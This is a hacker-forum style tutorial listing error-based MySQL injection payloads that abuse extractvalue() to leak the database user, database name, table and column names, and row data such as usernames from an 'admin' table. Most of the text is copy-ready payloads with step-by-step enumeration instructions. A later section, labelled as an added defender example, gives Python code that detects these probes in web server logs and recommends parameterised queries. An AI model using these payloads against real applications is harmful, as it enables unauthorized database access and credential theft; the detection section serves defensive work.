Pranaam to all bhai ji _/\_
Today I am going to share XPath injection payloads for SQL injection exploitation: error-based MySQL injection that abuses extractvalue(), one of MySQL's XML functions, so that the result of a subquery is leaked inside the server's error message.
So let's start...
First of all, the necessary condition is that the vulnerable application displays the MySQL server error when the query is wrong.
That means when you add ', " or \ to the parameter, the application should display a MySQL error.
Payload for extracting SQL user
===============================
and extractvalue(6678,concat(0x7e,(select user() ),0x7e ))-- -
Payload for extracting database name
====================================
and extractvalue(6678,concat(0x7e,(select database() ),0x7e ))-- -
Payload for extracting table name
=================================
The payload below extracts the first table name from the current database:
and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
For the next table name, change the LIMIT clause from 0,1 to 1,1, like this:
and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e ))-- -
Payload for extracting column name
==================================
The payload below extracts the first column name from the specified table:
and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_name=0xhex_value_of_table_name LIMIT 0,1),0x7e))-- -
Here we need to replace hex_value_of_table_name with the hex encoding of the table whose column names we want to extract.
For example, the table name admin has the hex value 61646d696e, so the payload becomes:
and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_name=0x61646d696e LIMIT 0,1),0x7e))-- -
For the next column name, just change the LIMIT clause from 0,1 to 1,1.
Payload for extracting data
===========================
The payload below extracts data from the specified column of the specified table:
and extractvalue(6678,concat(0x7e,(select column_name from table_name LIMIT 0,1),0x7e))-- -
You just need to replace column_name with the name of the column (for example, a column named username) and table_name with the name of the table (for example, a table named admin).
So the payload becomes:
and extractvalue(6678,concat(0x7e,(select username from admin LIMIT 0,1),0x7e))-- -
The above payload extracts the first value from the specified column; for the next value, just change LIMIT from 0,1 to 1,1, and so on :)
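Because every payload above shares the same shape (an XML function wrapped around concat() with a 0x7e delimiter or a subselect), it is easy to spot in web server logs. The following is an added defender-side example, not code from the original post: it scans constructed access-log lines for that shape and also covers updatexml(), MySQL's sibling XML function, which the post does not mention. The log format, IPs and URLs are assumptions made up for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signature of the error-based technique on this page: a MySQL XML function
# (extractvalue, or its sibling updatexml) wrapped around concat() carrying
# the 0x7e (~) delimiter or a subselect.
XML_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
CONCAT_PROBE = re.compile(r"concat\s*\(.*?(0x7e|\(\s*select\b)", re.I | re.S)
# Combined-log prefix (assumed format): client IP ... "METHOD /path?query HTTP/x"
LOG_PREFIX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def normalise(value: str) -> str:
    """Decode once more (double encoding), drop /**/ comments used as spaces."""
    decoded = unquote_plus(value)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).lower()

def flag_request(url: str) -> bool:
    """True when any query parameter carries the extractvalue()/updatexml() probe."""
    for _name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalise(raw)  # parse_qsl already URL-decoded once
        if XML_FUNC.search(value) and CONCAT_PROBE.search(value):
            return True
    return False

def scan_log(lines):
    """Return [(client_ip, request_url)] for every log line carrying the probe."""
    hits = []
    for line in lines:
        m = LOG_PREFIX.match(line)
        if m and flag_request(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample log (not real traffic): lines 2 and 3 carry the page's
# user()/database() payloads, line 4 is a benign search for the docs.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=3%27%20and%20'
    'extractvalue(6678,concat(0x7e,(select%20user()%20),0x7e%20))--%20- HTTP/1.1" 500 1024',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=3%27%20and%20'
    'updatexml(1,concat(0x7e,(select%20database())),1)--%20- HTTP/1.1" 500 1024',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?q=extractvalue+function+docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, url in scan_log(SAMPLE_LOG):
        print(f"error-based injection probe from {ip}: {url}")
```

A hit in this scan is worth correlating with 500 responses: the technique only works when the application echoes the raw MySQL error, so a generic error page plus parameterised queries removes the channel entirely.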
-==[[Love to]]==--
zero Cool ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,AR AR,Hackuin,Mannu, ViKi, Hardeep singh, Bhuppi,Mohit, Ffe, RR Mam, Jagriti, DON and bikash dash